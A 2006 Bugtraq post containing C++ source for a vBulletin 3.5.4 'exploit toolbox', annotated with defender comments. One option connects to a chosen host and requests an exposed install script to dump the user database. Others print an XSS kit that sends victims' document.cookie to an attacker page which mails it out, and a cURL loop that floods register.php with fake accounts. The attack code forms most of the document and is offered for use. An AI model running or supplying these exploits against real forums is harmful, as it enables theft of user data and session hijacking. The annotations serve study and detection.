Message-ID: <20061015212800.27453.qmail@securityfocus.com>
Date: 15 Oct 2006 21:28:00 -0000
From: m4k3@...security.securityfocus.com, "[dot]"@securityfocus.com,
de@...urityfocus.com
To: bugtraq@...urityfocus.com
Subject: vbulletin Exploit Tool Box
This toolbox contains three vBulletin exploits. Of these, only the vBulletin install path exploit can be run from the tool; the other two are only displayed.
Code:
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#include <iostream>
using namespace std;
/* Menu selection read from stdin in main(); compared against "1", "2" and "3". */
string exploit;
/* Reply to the "Use the exploit now?" prompt; main() acts only on the exact text "yes". */
string answer;
/* Not referenced anywhere in this listing. */
string answer2;
/* Holds the value returned by socket() in main(). */
long s;
/* Destination address filled in by main(): AF_INET, the address typed by the user, port 80. */
sockaddr_in addr;
/* Fixed 1024-byte buffer that receives the address text typed at the "Insert IP:" prompt. */
char IPaddr[1024];
/*You have to change to the right path*/
/* The complete HTTP/1.0 request main() sends. It asks the upgrade script under
   /install/ for step=backup&do=sqltable&table=user, so the request line itself is
   the indicator to search for in web-server access logs. */
char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n";
/* Receive buffer of 41943040 bytes (40 MiB), filled by a single recv() call in main(). */
char stry[41943040];
/* Return value of recv() in main(). */
long I;
/* Scratch state for the address check in main(): M is a position counter that is set
   to -1 on rejection, J counts '.' separators, K counts digits in the current group,
   L accumulates the numeric value of the current group. */
long M, J, K, L;
/* Index used to read IPaddr in main(); namespace-scope, so it starts at zero. */
int i;
/*
 * Interactive menu bundling three published vBulletin 3.5.4 advisories.
 *
 * Reads a menu choice from stdin into the global `exploit`:
 *   "1"  prints the install-path advisory text and asks "yes/no"; on "yes" the
 *        program opens a TCP connection to a user-supplied IPv4 address on port 80,
 *        sends the fixed request held in `sget`, and prints whatever comes back.
 *   "2"  prints a third-party XSS / cookie-capture write-up (text only).
 *   "3"  prints a third-party register.php flood script (text only).
 * The "2"/"3"/else chain hangs off the `answer == "yes"` test, so choosing "1" and
 * answering anything other than "yes" also ends in the final else branch.
 *
 * Returns 0 on normal completion or when the address is rejected, 1 when connect()
 * fails, 2 when send() returns 0, 3 when recv() returns 0.
 *
 * Defender notes: the only network action is the request in `sget`, which depends on
 * the forum's install/ directory still being reachable over HTTP. Requests for
 * install/upgrade*.php carrying step=backup or do=sqltable are the log indicator;
 * removing or access-restricting install/ on production hosts closes the exposure.
 */
int main()
{
/* Banner and menu. */
cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl;
cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl;
cout << "> Press 1 for Install_path exploit" << endl;
cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl;
cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl;
cout << "> Programm Author M4k3, www.pldsoft.com" << endl;
cout << "> Copyright by PLDsoft.com" << endl;
cout << "> Number? "; cin >> exploit;
cout << endl;
/* Option 1: print the install-path advisory, then ask whether to send the request. */
if (exploit == "1")
{
cout << " ____________________ " << endl;
cout << " |---PLDsoft.com------|" << endl;
cout << " |--------------------|" << endl;
cout << " |-vbulletin 3.5.4---|" << endl;
cout << " |install_path exploit|" << endl;
cout << " |____________________|" << endl;
cout << "##############################################" << endl;
cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl;
cout << "###############################################" << endl;
cout << endl;
cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl;
cout << "Remote : Yes" << endl;
cout << "Critical Level : Dangerous"<< endl;
cout << "############################################" << endl;
cout << "Affected software description :" << endl;
cout << endl;
cout << "Application : vbulletin" << endl;
/* NOTE(review): this printed version string ("3.60 Release 4") does not match the
   3.5.4 named in the banner; the page gives no way to tell which is correct. */
cout << "version : latest version [ 3.60 Release 4 ]" << endl;
cout << "URL : http://www.vbulletin.com" << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Exploit:" << endl;
cout << endl;
cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl;
cout << endl;
cout << "when it works, you can download the database..." << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Contact:" << endl;
cout << "Nick: M4k3" << endl;
cout << "E-mail: m4k3@...soft.com" << endl;
cout << "Website: http://www.pldsoft.com" << endl;
cout << "_______End of Exploit______" << endl;
cout << endl;
sleep(1);
cout << "Use the exploit now?" << endl;
cout << "yes/no: "; cin >> answer;
}
/* `answer` is only ever assigned inside the option-1 branch above, so this test can
   succeed only after option 1 was chosen. */
if (answer == "yes")
{
cout << "Starting vbulletin 3.5.4 install_path exploit" << endl;
{
/* Reads into a raw char array; before C++20 this extraction applies no length
   limit unless a stream width is set, so long input can overrun IPaddr. */
cout << "Insert IP: "; cin >> IPaddr;
M = 0;
J = 0;
K = 0;
L = 0;
/* Character check over IPaddr, indexed by the file-scope `i`: digits extend the
   current group (at most three), '.' closes a group, anything else rejects. */
while(IPaddr[i] != 0)
{
if(IPaddr[i] >= '0' && IPaddr[i] <= '9')
{
L *= 10;
L += IPaddr[i] - '0';
K++;
if(K > 3)
{
M = -1;
break;
}
}
else if(IPaddr[i] == '.')
{
if(K == 0)
{
M = -1;
break;
}
if(L >= 255)
{
M = -1;
break;
}
J++;
K = 0;
L = 0;
}
else
{
M = -1;
break;
}
M++;
}
/* Accept only when nothing was rejected and exactly three '.' were seen. */
if(M == -1 || J != 3)
{
cout << "> Invalid IP-Address!" << endl;
return 0;
}
/* Plain TCP to port 80 of the typed address; the results of socket() and
   inet_aton() are not checked. */
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
addr.sin_family = AF_INET;
inet_aton(IPaddr, &addr.sin_addr);
addr.sin_port = htons(80);
if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in)))
{
printf("Failure: Connection Rested!\r\n");
close(s);
return 1;
}
/* Sends the fixed request in `sget`. Only a return of 0 is treated as failure;
   send() reports errors as -1, which this comparison lets through. */
if(send(s, sget, strlen(sget), 0) == 0)
{
printf("Failure: Not able to send packets!\r\n");
close(s);
return 2;
}
/* One recv() call into the 40 MiB buffer; a response that arrives in several
   segments is not reassembled, and a -1 error return is not treated as failure. */
if((I = recv(s, stry, 41943040, 0)) == 0)
{
printf("Failure: Not able to receive packets!\r\n");
close(s);
return 3;
/* Unreachable: follows the return above. */
return 0;
}
close(s);
/* `I` is a long but is printed with %d. The response is printed with %s, which
   relies on the zero-initialised tail of `stry` for termination and stops at the
   first NUL byte in the data. */
printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I);
printf("%s", stry);
return 0;
}
}
/* Option 2: text only. Prints SpiderZ's XSS write-up: a PHP page that reads the `c`
   query parameter as a cookie value and mails it together with request details, and
   an HTML fragment (named image.gif in the text) whose onmouseover handler redirects
   to that page with document.cookie appended. Nothing is sent from this program.
   The doubled quotes inside the literals below are adjacent C++ string literals that
   concatenate, so the printed text contains no quote characters at those points. */
else if (exploit == "2")
{
cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl;
cout << "=> Author: SpiderZ"<< endl;
cout << "=> Sito: www.spiderz.tk"<< endl;
cout << endl;
cout << "_____________________________________________________________"<< endl;
cout << endl;
cout << "( 1 )"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; "<< endl;
cout << "if(!empty($ip_adresse)) "<< endl;
cout << "{ "<< endl;
cout << "echo 'il tuo ip ?: ',$ip_adresse; "<< endl;
cout << "} "<< endl;
cout << "else "<< endl;
cout << "{ "<< endl;
cout << "echo 'Impossible d\'afficher l\'IP'; "<< endl;
cout << "} "<< endl;
cout << "?> "<< endl;
cout << endl;
cout << "<a href=""log.php""></a><?"<< endl;
cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];"<< endl;
cout << "$day = date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl;
cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl;
cout << "else $visitor_info = $REMOTE_HOST;"<< endl;
cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl;
cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl;
cout << "$x2=$REMOTE_PORT;"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$cookie = $_GET['c'];"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl;
cout << "$today = date(""l, F j, Y, g:i a"") ;"<< endl;
cout << "$subject = ""Xss Vbulletin"" ;"<< endl;
cout << "$message = ""Xss: Hacking"""<< endl;
cout << "Ip: $ip_adresse "<< endl;
cout << "Cookie: $cookie"<< endl;
cout << "Url: $base"<< endl;
cout << "porta usata: $xx1"<< endl;
cout << "remote port: $x2"<< endl;
cout << "Giorno & Ora : $today \n"<< endl;
cout << endl;
cout << "$from = ""From: $myemail\r\n"";"<< endl;
cout << "mail($myemail, $subject, $message, $from);"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "( 2 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "Name file: image.gif"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "<pre a='>' onmouseover='document.location=""http://YOUR ADDRESS WEB.com/exploit.php?"" "<< endl;
cout << "c=""+document.cookie' b='</pre' >"""<< endl;
cout << endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "location=""http://YOUR ADDRESS WEB.com"""<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "( 3 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "Like Using"<< endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "1 new thread"<< endl;
cout << "2 <a href=""http://YOUR ADDRESS WEB.com/IMAGE.GIF"" target=""_blank"">BEAUTIFUL GIRL</a>'"<< endl;
cout << "3 Submit"<< endl;
cout << "4 It waits for"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "# www.spiderz.tk " << endl;
cout << endl;
cout << "_______End of Exploit______" << endl;
}
/* Option 3: text only. Prints x-boy's PHP/cURL script, which loops POST requests to
   register.php with do=addmember and a numbered username and e-mail per iteration.
   Nothing is sent from this program. On the server side the pattern appears as a
   burst of registration POSTs with sequentially numbered account names. */
else if (exploit == "3")
{
cout << "Script : vBulletin Version 3.5.4" << endl;
cout << endl;
cout << "site : www.vbulletin.com" << endl;
cout << endl;
cout << "Exploit by : x-boy" << endl;
cout << endl;
cout << "E-mail : Dicomdk (at) gmail (dot) com [email concealed]" << endl;
cout << endl;
cout << "Type : Registration flood in register.php" << endl;
cout << endl;
cout << "Thanks to : Simo64" << endl;
cout << endl;
cout << endl;
cout << "Code of exploit (For english version , you can change it to other language)=> exploit.php" << endl;
cout << endl;
cout << "cURL Must be activated (http://curl.haxx.se)" << endl;
cout << endl;
cout << "Sorry for my bad English :-)" << endl;
cout << endl;
cout << endl;
cout << "<?" << endl;
cout << endl;
cout << "set_time_limit(60);" << endl;
cout << endl;
cout << "//You can change 10 to other numbers" << endl;
cout << endl;
cout << "for($i = 1 ; $i <= 10 ; $i++)" << endl;
cout << endl;
cout << "{" << endl;
cout << endl;
cout << "//to put curl to send POST request" << endl;
cout << endl;
cout << "$ch = curl_init();" << endl;
cout << endl;
cout << "//change http://localhost/vb3 to the url of the script" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POST , 1) ;" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POSTFIELDS ," << endl;
cout << "'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5" << endl;
cout << "=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&password" << endl;
cout << "con" << endl;
cout << "firm=elmehdi&email=dicomdk'.$i.'@...il.com&emailconfirm=dicomdk'.$i.'@gm" << endl;
cout << "ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST" << endl;
cout << "corrections always on&options[showemail]=1');" << endl;
cout << endl;
cout << "curl_exec($ch);" << endl;
cout << endl;
cout << "curl_close($ch);" << endl;
cout << endl;
cout << "}" << endl;
cout << endl;
cout << "//Flood finished good luck" << endl;
cout << endl;
cout << "?>" << endl;
cout << endl;
cout << "____End of Exploit___" << endl;
}
/* Any other menu input, and option 1 answered with anything but "yes", lands here.
   The message mentions a file although no file is opened anywhere in this function. */
else
{
cout << "File not found / Failed to open file" << endl;
}
/* Footer printed on every path that did not return earlier. */
cout << endl;
cout << endl;
cout << endl;
cout << "Copyright and Programming by PLDsoft.com, [Author M4k3]" << endl;
cout << "Contact m4k3@...security[dot]de" << endl;
return 0;
}
More information: PLDsoft.com